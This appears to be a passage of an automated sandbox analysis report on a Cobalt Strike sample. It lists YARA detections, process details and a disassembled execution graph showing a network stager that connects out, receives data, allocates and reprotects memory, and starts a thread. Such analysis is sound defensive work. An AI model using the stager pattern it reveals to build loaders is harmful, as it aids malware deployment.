                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2897678631.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2897678631.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2897678631.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2221740996.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2221740996.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2221740996.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2221740996.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2288264868.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2288264868.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2288264868.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2288264868.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2651458102.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2651458102.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2651458102.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2651458102.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2919720968.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2919720968.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2919720968.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2919720968.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3357924421.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3357924421.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3357924421.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.3357924421.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2674172378.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2674172378.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2674172378.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2674172378.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2221645510.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2221645510.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2221645510.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2221645510.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2425276670.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2425276670.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2425276670.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2425276670.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2380403205.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2380403205.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2380403205.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2380403205.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2357611219.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2357611219.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2357611219.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2357611219.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2170181010.0000017F36BBF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2170181010.0000017F36BBF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2170181010.0000017F36BBF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2170181010.0000017F36BBF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3276936352.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3276936352.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3276936352.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3276936352.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2380566087.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2380566087.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2380566087.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2380566087.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2266186373.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2266186373.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2266186373.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2266186373.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:low
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:1
                                                                                                                            Start time:17:12:07
                                                                                                                            Start date:19/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            Disassembly

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:3.8%
                                                                                                                              Dynamic/Decrypted Code Coverage:19.3%
                                                                                                                              Signature Coverage:49.9%
                                                                                                                              Total number of Nodes:337
                                                                                                                              Total number of Limit Nodes:8
                                                                                                                              execution_graph 18677 17f38ac972c 18678 17f38ac974b 18677->18678 18680 17f38ac9769 18677->18680 18678->18680 18681 17f38ac78c4 18678->18681 18682 17f38ac78ef _DllMainCRTStartup 18681->18682 18683 17f38ac7988 InternetOpenA 18682->18683 18684 17f38ac78f7 _DllMainCRTStartup 18682->18684 18683->18684 18684->18680 19029 7ff7193c1ce0 19030 7ff7193c1d1f 19029->19030 19031 7ff7193c1cf3 19029->19031 19032 7ff7193c1d17 19031->19032 19033 7ff7193c1d38 _invalid_parameter_noinfo_noreturn 19031->19033 19034 7ff7193c1f50 free 19032->19034 19034->19030 19035 7ff7193c1f60 19036 7ff7193c1f70 pre_c_initialization 19035->19036 19048 7ff7193c2584 19036->19048 19038 7ff7193c28d0 __scrt_fastfail 9 API calls 19039 7ff7193c2016 __scrt_initialize_default_local_stdio_options 19038->19039 19040 7ff7193c1f95 pre_c_initialization _RTC_Initialize 19046 7ff7193c1ff8 pre_c_initialization 19040->19046 19056 7ff7193c2870 InitializeSListHead 19040->19056 19046->19038 19047 7ff7193c2006 19046->19047 19049 7ff7193c25cf 19048->19049 19050 7ff7193c2599 19048->19050 19049->19040 19051 7ff7193c2651 19050->19051 19054 7ff7193c25a2 __scrt_release_startup_lock 19050->19054 19052 7ff7193c28d0 __scrt_fastfail 9 API calls 19051->19052 19053 7ff7193c265b 19052->19053 19054->19049 19055 7ff7193c25bf _initialize_onexit_table 19054->19055 19055->19049 19069 7ff7193c21c0 19072 7ff7193c27b0 19069->19072 19073 7ff7193c27d3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 19072->19073 19074 7ff7193c21c9 19072->19074 19073->19074 18685 7ff7193c2044 18686 7ff7193c205d __scrt_initialize_crt 18685->18686 18687 7ff7193c2065 __scrt_acquire_startup_lock 18686->18687 18688 7ff7193c219b 18686->18688 18690 7ff7193c21a5 18687->18690 18695 7ff7193c2083 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 18687->18695 18724 7ff7193c28d0 IsProcessorFeaturePresent 18688->18724 18691 7ff7193c28d0 __scrt_fastfail 9 API calls 18690->18691 18692 7ff7193c21b0 18691->18692 18694 7ff7193c21b8 _exit 18692->18694 18693 7ff7193c20a8 18695->18693 18696 7ff7193c212e __p___argv __p___argc _get_initial_narrow_environment 18695->18696 18700 7ff7193c2126 _register_thread_local_exe_atexit_callback 18695->18700 18705 7ff7193c10d0 WSAStartup 18696->18705 18700->18696 18702 7ff7193c215b 18703 7ff7193c2160 _cexit 18702->18703 18704 7ff7193c2165 __scrt_uninitialize_crt 18702->18704 18703->18704 18704->18693 18706 7ff7193c1133 18705->18706 18707 7ff7193c112a 18705->18707 18730 7ff7193c1010 __acrt_iob_func 18706->18730 18775 7ff7193c1ef0 18707->18775 18709 7ff7193c1157 SleepEx 18733 7ff7193c1850 18709->18733 18714 7ff7193c1010 printf 2 API calls 18715 7ff7193c11a9 SleepEx GetConsoleWindow ShowWindow memcpy VirtualProtect 18714->18715 18716 7ff7193c11f6 CreateThread WaitForSingleObject 18715->18716 18717 7ff7193c121e 18715->18717 18716->18717 18718 7ff7193c1249 WSACleanup 18717->18718 18772 7ff7193c1f50 18717->18772 18718->18707 18722 7ff7193c2a24 GetModuleHandleW 18723 7ff7193c2157 18722->18723 18723->18692 18723->18702 18725 7ff7193c28f5 __scrt_fastfail 18724->18725 18726 7ff7193c2903 memset RtlCaptureContext RtlLookupFunctionEntry 18725->18726 18727 7ff7193c2979 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18726->18727 18728 7ff7193c293d RtlVirtualUnwind 18726->18728 18729 7ff7193c29fd __scrt_fastfail 18727->18729 18728->18727 18729->18690 18784 7ff7193c1000 18730->18784 18732 7ff7193c1046 __stdio_common_vfprintf 18732->18709 18785 7ff7193c1270 18733->18785 18735 7ff7193c18d1 socket 18736 7ff7193c18ff inet_addr 18735->18736 18739 7ff7193c197d 18735->18739 18737 7ff7193c1910 gethostbyname 18736->18737 18738 7ff7193c1918 inet_addr gethostbyaddr 18736->18738 18741 7ff7193c1935 18737->18741 18738->18741 18898 7ff7193c1070 18739->18898 18742 7ff7193c1974 closesocket 18741->18742 18743 7ff7193c193a htons connect 18741->18743 18742->18739 18743->18739 18743->18742 18744 7ff7193c19a4 18744->18744 18745 7ff7193c1070 __stdio_common_vsprintf 18744->18745 18746 7ff7193c1a11 18745->18746 18746->18746 18747 7ff7193c1a9a send memset recv 18746->18747 18748 7ff7193c1b40 strstr 18747->18748 18749 7ff7193c1ae0 realloc memcpy memset recv 18747->18749 18750 7ff7193c1b55 strstr 18748->18750 18751 7ff7193c1b6a 18748->18751 18749->18748 18749->18749 18750->18751 18752 7ff7193c1b7e memcpy 18751->18752 18901 7ff7193c1f58 18752->18901 18754 7ff7193c1ba1 strncpy 18755 7ff7193c1f50 free 18754->18755 18756 7ff7193c1bc4 closesocket 18755->18756 18757 7ff7193c1be4 18756->18757 18758 7ff7193c1c18 18756->18758 18760 7ff7193c1c13 18757->18760 18764 7ff7193c1c0c _invalid_parameter_noinfo_noreturn 18757->18764 18759 7ff7193c1c59 18758->18759 18762 7ff7193c1c54 18758->18762 18766 7ff7193c1c4d _invalid_parameter_noinfo_noreturn 18758->18766 18763 7ff7193c1cac 18759->18763 18768 7ff7193c1ca7 18759->18768 18770 7ff7193c1ca0 _invalid_parameter_noinfo_noreturn 18759->18770 18761 7ff7193c1f50 free 18760->18761 18761->18758 18767 7ff7193c1f50 free 18762->18767 18765 7ff7193c1ef0 8 API calls 18763->18765 18764->18760 18769 7ff7193c1176 VirtualAlloc 18765->18769 18766->18762 18767->18759 18771 7ff7193c1f50 free 18768->18771 18769->18714 18770->18768 18771->18763 18773 7ff7193c24f4 free 18772->18773 18776 7ff7193c1efa 18775->18776 18777 7ff7193c1266 18776->18777 18778 7ff7193c2208 IsProcessorFeaturePresent 18776->18778 18777->18722 18779 7ff7193c221f 18778->18779 18937 7ff7193c22dc RtlCaptureContext 18779->18937 18784->18732 18786 7ff7193c12c0 18785->18786 18786->18786 18902 7ff7193c1d40 18786->18902 18788 7ff7193c12d6 18789 7ff7193c1d40 7 API calls 18788->18789 18790 7ff7193c1311 18789->18790 18791 7ff7193c1328 memcmp 18790->18791 18794 7ff7193c133b 18790->18794 18791->18794 18792 7ff7193c1381 18795 7ff7193c13b2 18792->18795 18796 7ff7193c1386 memcpy 18792->18796 18793 7ff7193c1379 18798 7ff7193c1f50 free 18793->18798 18794->18792 18794->18793 18797 7ff7193c1372 _invalid_parameter_noinfo_noreturn 18794->18797 18799 7ff7193c1d40 7 API calls 18795->18799 18796->18795 18797->18793 18798->18792 18800 7ff7193c13ec 18799->18800 18801 7ff7193c1403 memcmp 18800->18801 18804 7ff7193c1416 18800->18804 18801->18804 18802 7ff7193c145c 18805 7ff7193c1461 memcpy 18802->18805 18806 7ff7193c148d 18802->18806 18803 7ff7193c1454 18808 7ff7193c1f50 free 18803->18808 18804->18802 18804->18803 18807 7ff7193c144d _invalid_parameter_noinfo_noreturn 18804->18807 18805->18806 18809 7ff7193c14bc 18806->18809 18810 7ff7193c14a4 memchr 18806->18810 18807->18803 18808->18802 18811 7ff7193c1798 18809->18811 18812 7ff7193c14ce 18809->18812 18810->18809 18814 7ff7193c17ba 18811->18814 18815 7ff7193c1d40 7 API calls 18811->18815 18813 7ff7193c1d40 7 API calls 18812->18813 18821 7ff7193c1500 18813->18821 18816 7ff7193c1d40 7 API calls 18814->18816 18815->18814 18818 7ff7193c17cf 18816->18818 18817 7ff7193c1557 18819 7ff7193c153f 18817->18819 18823 7ff7193c1590 18817->18823 18829 7ff7193c1589 _invalid_parameter_noinfo_noreturn 18817->18829 18820 7ff7193c1d40 7 API calls 18818->18820 18824 7ff7193c1842 18819->18824 18825 7ff7193c1d40 7 API calls 18819->18825 18834 7ff7193c1736 18820->18834 18821->18817 18821->18819 18822 7ff7193c1537 18821->18822 18826 7ff7193c1550 _invalid_parameter_noinfo_noreturn 18821->18826 18828 7ff7193c1f50 free 18822->18828 18830 7ff7193c1f50 free 18823->18830 18922 7ff7193c1ea0 ?_Xout_of_range@std@@YAXPEBD 18824->18922 18842 7ff7193c15da 18825->18842 18826->18817 18828->18819 18829->18823 18830->18819 18831 7ff7193c1848 18837 7ff7193c1270 17 API calls 18831->18837 18832 7ff7193c1820 18836 7ff7193c1ef0 8 API calls 18832->18836 18833 7ff7193c1631 18844 7ff7193c166a 18833->18844 18845 7ff7193c1619 18833->18845 18850 7ff7193c1663 _invalid_parameter_noinfo_noreturn 18833->18850 18834->18832 18835 7ff7193c181b 18834->18835 18838 7ff7193c1814 _invalid_parameter_noinfo_noreturn 18834->18838 18839 7ff7193c1f50 free 18835->18839 18840 7ff7193c182c 18836->18840 18843 7ff7193c18d1 socket 18837->18843 18838->18835 18839->18832 18840->18735 18841 7ff7193c1611 18847 7ff7193c1f50 free 18841->18847 18842->18833 18842->18841 18842->18845 18846 7ff7193c162a _invalid_parameter_noinfo_noreturn 18842->18846 18848 7ff7193c18ff inet_addr 18843->18848 18849 7ff7193c197d 18843->18849 18851 7ff7193c1f50 free 18844->18851 18855 7ff7193c16d2 18845->18855 18856 7ff7193c183d 18845->18856 18846->18833 18847->18845 18852 7ff7193c1910 gethostbyname 18848->18852 18853 7ff7193c1918 inet_addr gethostbyaddr 18848->18853 18854 7ff7193c1070 __stdio_common_vsprintf 18849->18854 18850->18844 18851->18845 18857 7ff7193c1935 18852->18857 18853->18857 18862 7ff7193c19a4 18854->18862 18861 7ff7193c1d40 7 API calls 18855->18861 18923 7ff7193c1ea0 ?_Xout_of_range@std@@YAXPEBD 18856->18923 18859 7ff7193c1974 closesocket 18857->18859 18860 7ff7193c193a htons connect 18857->18860 18859->18849 18860->18849 18860->18859 18863 7ff7193c16f6 18861->18863 18862->18862 18864 7ff7193c1070 __stdio_common_vsprintf 18862->18864 18863->18834 18866 7ff7193c1754 18863->18866 18867 7ff7193c172e 18863->18867 18868 7ff7193c174d _invalid_parameter_noinfo_noreturn 18863->18868 18872 7ff7193c1a11 18864->18872 18865 7ff7193c1791 18871 7ff7193c1f50 free 18865->18871 18866->18834 18866->18865 18870 7ff7193c178a _invalid_parameter_noinfo_noreturn 18866->18870 18869 7ff7193c1f50 free 18867->18869 18868->18866 18869->18834 18870->18865 18871->18834 18872->18872 18873 7ff7193c1a9a send memset recv 18872->18873 18874 7ff7193c1b40 strstr 18873->18874 18875 7ff7193c1ae0 realloc memcpy memset recv 18873->18875 18876 7ff7193c1b55 strstr 18874->18876 18877 7ff7193c1b6a 18874->18877 18875->18874 18875->18875 18876->18877 18878 7ff7193c1b7e memcpy 18877->18878 18879 7ff7193c1f58 18878->18879 18880 7ff7193c1ba1 strncpy 18879->18880 18881 7ff7193c1f50 free 18880->18881 18882 7ff7193c1bc4 closesocket 18881->18882 18883 7ff7193c1be4 18882->18883 18884 7ff7193c1c18 18882->18884 18886 7ff7193c1c13 18883->18886 18890 7ff7193c1c0c _invalid_parameter_noinfo_noreturn 18883->18890 18885 7ff7193c1c59 18884->18885 18888 7ff7193c1c54 18884->18888 18892 7ff7193c1c4d _invalid_parameter_noinfo_noreturn 18884->18892 18889 7ff7193c1cac 18885->18889 18894 7ff7193c1ca7 18885->18894 18896 7ff7193c1ca0 _invalid_parameter_noinfo_noreturn 18885->18896 18887 7ff7193c1f50 free 18886->18887 18887->18884 18893 7ff7193c1f50 free 18888->18893 18891 7ff7193c1ef0 8 API calls 18889->18891 18890->18886 18895 7ff7193c1cbe 18891->18895 18892->18888 18893->18885 18897 7ff7193c1f50 free 18894->18897 18895->18735 18896->18894 18897->18889 18936 7ff7193c1000 18898->18936 18900 7ff7193c1096 __stdio_common_vsprintf 18900->18744 18903 7ff7193c1d5e memcpy 18902->18903 18906 7ff7193c1d89 18902->18906 18903->18788 18905 7ff7193c1e8c 18931 7ff7193c1ec0 ?_Xlength_error@std@@YAXPEBD 18905->18931 18906->18905 18909 7ff7193c1de6 18906->18909 18910 7ff7193c1e0d 18906->18910 18924 7ff7193c1f14 18909->18924 18911 7ff7193c1e12 18910->18911 18912 7ff7193c1e1f 18910->18912 18914 7ff7193c1f14 2 API calls 18911->18914 18915 7ff7193c1e21 memcpy 18912->18915 18917 7ff7193c1df6 18914->18917 18918 7ff7193c1e41 18915->18918 18919 7ff7193c1e6e 18915->18919 18916 7ff7193c1e85 _invalid_parameter_noinfo_noreturn 18916->18905 18917->18915 18917->18916 18918->18916 18920 7ff7193c1e66 18918->18920 18919->18788 18921 7ff7193c1f50 free 18920->18921 18921->18919 18925 7ff7193c1f2e malloc 18924->18925 18926 7ff7193c1f1f 18925->18926 18927 7ff7193c1f38 18925->18927 18926->18925 18928 7ff7193c1f3e 18926->18928 18927->18917 18930 7ff7193c1f49 18928->18930 18932 7ff7193c24a0 18928->18932 18935 7ff7193c2390 18932->18935 18934 7ff7193c24ae _CxxThrowException 18935->18934 18936->18900 18938 7ff7193c22f6 RtlLookupFunctionEntry 18937->18938 18939 7ff7193c2232 18938->18939 18940 7ff7193c230c RtlVirtualUnwind 18938->18940 18941 7ff7193c21d4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18939->18941 18940->18938 18940->18939 19062 7ff7193c2f24 _seh_filter_exe 19063 7ff7193c2b38 19064 7ff7193c2b50 19063->19064 19065 7ff7193c2b5a 19063->19065 19066 7ff7193c1f50 free 19064->19066 19066->19065 19016 7ff7193c245c __std_exception_destroy 19017 7ff7193c2490 19016->19017 19018 7ff7193c2483 19016->19018 19019 7ff7193c1f50 free 19018->19019 19019->19017 19057 7ff7193c2172 19058 7ff7193c2a24 __scrt_is_managed_app GetModuleHandleW 19057->19058 19059 7ff7193c2179 19058->19059 19060 7ff7193c21b8 _exit 19059->19060 19061 7ff7193c217d 19059->19061 19068 7ff7193c23b0 __std_exception_copy 19020 7ff7193c2e34 19021 7ff7193c2e6c __GSHandlerCheckCommon 19020->19021 19022 7ff7193c2e98 19021->19022 19023 7ff7193c2e87 __CxxFrameHandler3 19021->19023 19023->19022 19024 7ff7193c2028 19028 7ff7193c2a78 SetUnhandledExceptionFilter 19024->19028 18942 17f38adf894 18947 17f38adf8b0 _DllMainCRTStartup 18942->18947 18945 17f38adf987 18949 17f38adf90a 18945->18949 18950 17f38adf734 _CRT_INIT GetFileType 18945->18950 18946 17f38adf95e 18946->18945 18951 17f38ad4e98 _DllMainCRTStartup 9 API calls 18946->18951 18948 17f38adf940 18947->18948 18947->18949 18954 17f38adf734 18947->18954 18948->18949 18958 17f38ad4e98 18948->18958 18950->18949 18952 17f38adf97a 18951->18952 18953 17f38adf734 _CRT_INIT GetFileType 18952->18953 18953->18945 18955 17f38adf746 _mtinit _heap_init _CRT_INIT _RTC_Initialize 18954->18955 18957 17f38adf74f 9 library calls 18954->18957 18955->18957 18964 17f38ae52b0 18955->18964 18957->18948 18959 17f38ad4f73 18958->18959 18963 17f38ad4eba _DllMainCRTStartup 18958->18963 18974 17f38ad6fc0 18959->18974 18961 17f38ad4ebf _DllMainCRTStartup 18961->18946 18963->18961 18968 17f38ac5dd0 18963->18968 18967 17f38ae52df _lock _calloc_crt 18964->18967 18965 17f38ae5303 _ioinit __updatetlocinfo 18965->18957 18966 17f38ae553e GetFileType 18966->18967 18967->18965 18967->18966 18969 17f38ac5dee malloc _DllMainCRTStartup 18968->18969 18978 17f38ad15e0 18969->18978 18975 17f38ad6fe4 memcpy_s malloc _DllMainCRTStartup 18974->18975 18977 17f38ad70f6 memcpy_s malloc _DllMainCRTStartup 18975->18977 18995 17f38ac9d64 18975->18995 18977->18961 18979 17f38ad15fe _DllMainCRTStartup 18978->18979 18982 17f38ad17a8 18979->18982 18981 17f38ad1714 memcpy_s _DllMainCRTStartup 18983 17f38ad17d1 _DllMainCRTStartup 18982->18983 18984 17f38ad181f GetUserNameA 18983->18984 18985 17f38ad1848 18984->18985 18988 17f38ac9d58 18985->18988 